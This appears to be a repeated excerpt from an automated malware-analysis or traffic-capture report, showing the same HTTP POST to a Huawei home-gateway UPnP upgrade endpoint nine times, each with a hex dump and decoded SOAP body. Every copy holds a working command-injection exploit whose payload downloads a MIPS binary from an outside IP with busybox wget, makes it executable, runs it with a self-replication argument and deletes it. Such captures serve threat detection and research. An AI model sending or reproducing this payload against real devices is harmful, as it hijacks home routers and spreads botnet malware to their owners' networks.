      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
